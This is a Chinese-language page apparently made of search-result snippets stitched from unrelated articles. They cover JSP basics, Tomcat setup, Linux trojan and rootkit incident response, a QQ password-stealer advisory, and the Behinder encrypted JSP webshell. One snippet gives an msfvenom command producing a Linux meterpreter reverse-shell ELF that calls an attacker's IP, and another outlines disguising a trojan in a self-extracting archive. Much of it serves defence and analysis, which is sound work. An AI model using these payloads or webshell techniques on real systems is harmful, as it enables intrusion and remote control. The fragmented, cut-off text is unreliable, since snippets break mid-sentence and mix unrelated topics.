前言 这里简单学习一下冰蝎是怎么运行的,如何通过加密解密来绕过一些常见的waf设备 工作流程 冰蝎准备一个经过加密的字节码,放入请求体中 服务端通过jsp中的密钥解密,然后调用equals方法,来获取此次执行的结果...String md5Key = DigestUtils.md5DigestAsHex(key.getBytes()); return md5Key; } } 这里使用的jsp...木马如下 我这里做了一些便于学习的东西,将冰蝎发送过来的字节码保存成类文件,更直观一点 <%@ page contentType="text/html;charset=UTF-8" language="...的<em>木马</em>也比较好理解,将密钥作为标识符设置到session中,然后判断是否为POST请求,如果是的话先获取客户端的请求体数据,然后先解码base64,然后解密获取class字节码数据,调用方法g来实例化对象...<em>木马</em>调用的equals方法,来具体看看这一步做了什么 调用fillContext方法,来初始化request和response以及一些后续需要用到的参数,这就是为啥会选择equals的方法了,传入的obj
被抓来当矿工了 查看进程信息 ps -ef | grep minerd 是tmp下的一个文件 马上执行 kill 杀掉这个进程,并删除对应文件 再次 top 命令查看,资源占用恢复正常 因为木马有自我改名
0x00 前言 Linux盖茨木马是一类有着丰富历史,隐藏手法巧妙,网络攻击行为显著的DDoS木马,主要恶意特点是具备了后门程序,DDoS攻击的能力,并且会替换常用的系统文件进行伪装。...木马得名于其在变量函数的命名中,大量使用Gates这个单词。分析和清除盖茨木马的过程,可以发现有很多值得去学习和借鉴的地方。...从以上种种行为发现该病毒与“盖茨木马”有点类似,具体技术分析细节详见: Linux平台“盖茨木马”分析 http://www.freebuf.com/articles/system/117823.html...悬镜服务器卫士丨Linux平台“盖茨木马”分析 http://www.sohu.com/a/117926079_515168 手动清除木马过程: 1、简单判断有无木马 #有无下列文件 cat /etc...(启动上述描述的那些木马变种程序) rm -f /etc/rc.d/rc1.d/S97DbSecuritySpt rm -f /etc/rc.d/rc2.d/S97DbSecuritySpt rm -f
Linux系统安装组件apache 1.3.12 + tomcat 3.1.1 + JDK 1.2.2 + mod_jserv.so 1.....tar.gz http://java.sun.com/products/jdk/1.2/download-linux.html mod_jserv.so http://jakarta.apache.org.../builds/jakarta-tomcat/release/v3.1.1/bin/linux/i386 2..../tomcat.sh stop ) 9) 测试jsp 打开浏览器,敲入 http://localhost/examples 如果你看见jsp,servlet目录,则说明你的apache和tomcat已经连接成功...你可以使用jsp和servlet了。
思 路 Linux下的木马常常是恶意者通过Web的上传目录的方式上传木马到Linux服务器的,所以可从恶意者:访问网站-->Linux系统-->HTTP服务-->中间件-->程序代码--...控制上传目录的权限以及非站点目录的权限(Linux文件目录权限+Web服务层控制)。 4. 上传木马文件后的访问和执行控制(Web服务层+文件系统存储层)。 5....安装杀毒软件clamav等,定期监测查杀木马。 7. 配置服务器防火墙及入侵检测服务。 8. 监控服务器文件变更、进程变化、端口变化、重要安全日志并及时报警。
在服务器木马后门检测中rookit也是根据特征的,他们检查的都是某一些rk的看这个root或者一些其他的通用型root的,但我现在所使用的项目,它这个UK的可能比较小众,所以没有被检测出来。...那第二种方法就是说这种就比较顽强的了,你要把Linux挂载到其他的Linux系统上,去找到它,这样的话把它删除掉就可以了。...那请勿在生产环境测试的因为rookit并不是一个稳定的内核,一旦插入的内核有可能导致整个Linux崩溃,如果遇到一些被替换了系统命令文件的木马后门无法查找的话可以向服务器安全服务商SINE安全寻求技术支持进行详细的木马后门排查
记录一次查询清除木马过程 木马名称: Linux.BackDoor.Gates.5 链接:https://forum.antichat.ru/threads/413337/ 前两天服务器被扫描后...root/usrclamav.log clamscan -r –remove /bin/ clamscan -r –remove /usr/bin/ 查看日志发现 /bin/netstat: Linux.Trojan.Agent...FOUND为病毒 grep FOUND /root/usrclamav.log /usr/bin/.sshd: Linux.Trojan.Agent FOUND /usr/sbin/ss: Linux.Trojan.Agent...FOUND /usr/sbin/lsof: Linux.Trojan.Agent FOUND 如: “` ?...下面的内容设置可以实现在Linux下所有用户,不管是远程还是本地登陆,在本机的所有操作都会记录下来,并生成包含“用户/IP/时间”的文件存放在指定位置。
Linux(Ubuntu平台)JSP通过JDBC连接MySQL数据库,与Windows平台类似,步骤如下: 下载 jdbc: mysql-connector-java-5.1.18.tar.gz...5.1.18.tar.gz 配置 jdbc:cp mysql-connector-java-5.1.18-bin.jar /usr/local/jdk1.6.0_22/jre/lib/ext/ JSP
“QQ大盗”变种AC(Win32.PSWTroj.QQPass.ac)是一个盗取QQ账号和密码的木马病毒。...“网游追击者”变种CD(Win32.Troj.LipGame.cd)是一个盗取多个网络游戏账号的木马病毒。...,并将其发送给木马种植者,造成用户的网络个人财产的损失。...此外,它还会自动连接到指定的站点,下载盗号木马或其他恶意程序,进一步威胁用户的电脑系统及网络个人财产安全。 该病毒运行后,会释放SysWFGQQ2.DLL病毒文件,修改注册表,实现随开机自动启动。...并将其发送给木马种植者,造成用户的虚拟财产的损失。
1.jsp跳转jsp jsp1代码 <%-- Created by IntelliJ IDEA....-8" language="java" %> ajax <form action="index.<em>jsp</em>...username值:"+username); request.getSession().setAttribute("name", username); %>--%> jsp2...2.也可以在上面先得到前一个jsp页面传来的参数,再讲参数放到request或者其他域中, 然后使用${username}得到 String username = request.getParameter...跳转servlet跳转jsp jsp1页面代码 <%-- Created by IntelliJ IDEA.
前段时间公司发生了一起服务器入侵事件,在此分享给大家也顺便理顺下linux入侵应急响应思路。 一、事件描述 某天监控同事反馈有台机器cpu飙高到2000%,可能机器已经被黑。...三、总结 首先啰嗦一下,关于linux主机,高危端口真得万万不能全网开放。看了日志后,发现黑客真是时时刻刻在爆破啊。...关于linux入侵的排查思路,总结如下: 1.查看异常进程活动-查找是否有异常进程和端口占用 1.1查找占用cpu最多的进程,相关命令:运行top命令后,键入大写字母P按cpu排序; 1.2查找占用内存最多的进程
Kworker 木马,如果发现root 权限计划任务有以下这种非常规任务,说明已经中招成了矿机 Dt 环境,大家要注意,切莫随便给开放端口。
最后:伪装的木马虽然骗的了我们的眼睛,但是骗不过杀毒软件,只有免杀的木马穿上这件马夹才能碰撞出更激情的火花,实现华丽转身。
1 JSP概述 1.1 什么是JSP JSP(Java Server Pages)是JavaWeb服务器端的动态资源。它与html页面的作用是相同的,显示数据和获取数据。...1.2 JSP的组成 JSP = html + Java脚本(代码片段) + JSP动态标签 ?...所以JSP其实就是一个Servlet! ? ? 3.2 JSP真身存放目录 JSP生成的Servlet存放在${CATALANA}/work目录下,我经常开玩笑的说,它是JSP的“真身”。...[崔9]JSP页面中的内容都会在这个位置出现!这时上面所说的对象已经创建完了,所以在JSP页面中是可以使用的。 4 再论JSP脚本 JSP脚本一共三种形式: l 中的内容在JSP编译成.java时会被忽略的,即JSP注释。 也可以在JSP页面中使用html注释:<!
在JSP中,request和response是非常重要的两个东西,请务必知道他们的常用方法。...我们对前四个方法做一个小案例,首先我们建立几个jsp页面,分别叫hello1,hello2,hello3 我们让hello1获取一个name参数,保存到key为name中,然后转发给hello2.jsp...,hello2不做处理直接转发给hello3.jsp,相关代码如下 hello1.jsp 我是Hello1 我们启动项目,到浏览器中访问hello1.jsp,会发现其实访问的是hello3.jsp中的内容,但是地址栏不改变,name值也成功取出来。...,所以我们需要去写这个jsp,我们在里面加入验证用户名密码的功能,如果正确就转发给welcome.jsp,因为转发才可以传递request。
了解JSP JSP 本质上就是⼀个 Servlet,JSP 主要负责与⽤户交互,将最终的界⾯呈现给⽤户。 在Java中,只有Servlet接口才可以于浏览器交互。...JSP引擎会将你写好了的jsp转化为Java类,也就是Servlet类,如果你去看他转化之后的源代码,你会发现它实际上就是我们之前使用原始Servlet的servletResponse.getWriter...换句话说,当服务器接收到⼀个后缀是 jsp 的请求时,将该请求交给 JSP 引擎去处理,每⼀个 JSP 页面第⼀次被访问的时候,JSP 引擎会将它翻译成⼀个 Servlet ⽂件,再由 Web 容器调⽤...嵌入方式 1.JSP 脚本,执⾏ Java 逻辑代码 我们去新建一个JSP页面,就叫test.jsp,运行项目后在浏览器中访问该页面。...page:当前 JSP 对应的 Servlet 对象,Servlet。 exception:表示 JSP 页面发⽣的异常,Exception。很少用到。
& f0rb1dd3分享的Linux RootKit高级技术,加载执行Linux Rootkit木马,如下所示: 2.解密Linux RootKit木马数据过程,如下所示: 3.Linux RootKit...木马数据,如下所示: 4.笔者自己编写了一个简单的解密程序,用于解密上面的Linux RootKit木马数据,如下所示: 5.解密Linux RootKit木马数据之后,如下所示: 6.通过逆向分析解密出来的...Linux RootKit木马,发现是Reptile木马源代码修改的,如下所示: 7.Reptile是一款开源的Linux RootKit木马程序,Linux RootKit木马功能非常强大,如下所示...: 可以隐藏文件、目录、自身、网络连接、反弹shell木马等,Linux RootKit木马运行之后,如下所示: 该Linux RootKit木马可以通过Volatility内存检测的方法发现木马后门模块...笔者一直从事与恶意软件威胁情报等相关安全分析与研究工作,包含挖矿、勒索、远控后门、僵尸网络、加载器、APT攻击样本、CS木马、Rootkit后门木马等,涉及到多种平台(Windows/Linux/Mac
环境: 攻击者:kali 目标主机:Windows 一、了解木马 1.木马,又称为特洛伊木马 特洛伊木马(Trojan Horse),这个名字源于公元前十二世纪希腊与特洛伊之间的一场战争。...payload),用于反弹shell lhost= 这里写的是攻击者的IP lport= 这里写的是攻击者主机上用于监听的端口(任意未被占用的端口) -f 文件类型 -o 输出的文件名 Linux...木马 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f elf -o muma.elf...三、木马的危害 由于本文探讨木马远控,这里就暂时省略文件上传、命令执行下载木马等方式将木马传入目标主机的讨论。...木马捆绑: 制作自解压木马(准备一个木马、一个图片、一个压缩软件即可) 攻击者可以制作一个自解压木马,诱导目标解压压缩包。在目标解压压缩文件的同时会运行压缩文件里的木马程序,从而被控制。
要想在Linux系统上开发或研究木马病毒等特殊程序,我们需要使用一系列强大的开发和调试攻击。本节先介绍几种在Linux系统上极为强大的工具。...第一个当然是gdb了,在Linux上,它是唯一能用于程序调试的利器。...我们后面开发代码或调试分析其他病毒或木马的设计模式和原理时,必须使用gdb作为手术刀,对要研究的病毒和木马进行”剖尸检验“,通过gdb调查木马或病毒的代码设计方法,同时也使用gdb加载恶意代码,研究其运转流程...第二个是objdump,它的作用是将恶意代码所编制成的可执行文件内部信息抽取出来,例如如果病毒或木马最后编译成ELF格式的可执行文件,那么我们可以使用该工具将里面的各种信息展示出来,举个例子,使用C语言写一个...; } 然后使用gcc编译成可执行文件,命令如下: gcc -Wall -g hello_world.c -o hello_world 注意到gcc也是在Linux上进行程序开发必不可少的编译器
在日常繁琐的运维工作中,对linux服务器进行安全检查是一个非常重要的环节。今天,分享一下如何检查linux系统是否遭受了入侵?...三、顺便说下一次Linux系统被入侵/中毒的解决过程 在工作中碰到系统经常卡,而且有时候远程连接不上,从本地以及远程检查一下这个系统,发现有不明的系统进程。 初步判断就是可能中毒了!!!...意识到了这台测试机被人种了木马,于是开始了紧张的排查过程: 1)运行ps和top命令 发现了两个陌生名称的程序(比如mei34hu)占用了大部分CPU资源,显然这是别人植入的程序!...7)顾虑到系统常用命令中(如ls,ps等)可能会隐藏启动进程,这样一旦执行又会拉起木马程序。...2)将可疑文件设为不可执行,用chattr +ai将几个重要目录改为不可添加和修改,再将进程杀了,再重启 3)chkrootkit之类的工具查一下 对于以上这些梳理的木马排查的思路要清楚,排查手段要熟练
领取专属 10元无门槛券
手把手带您无忧上云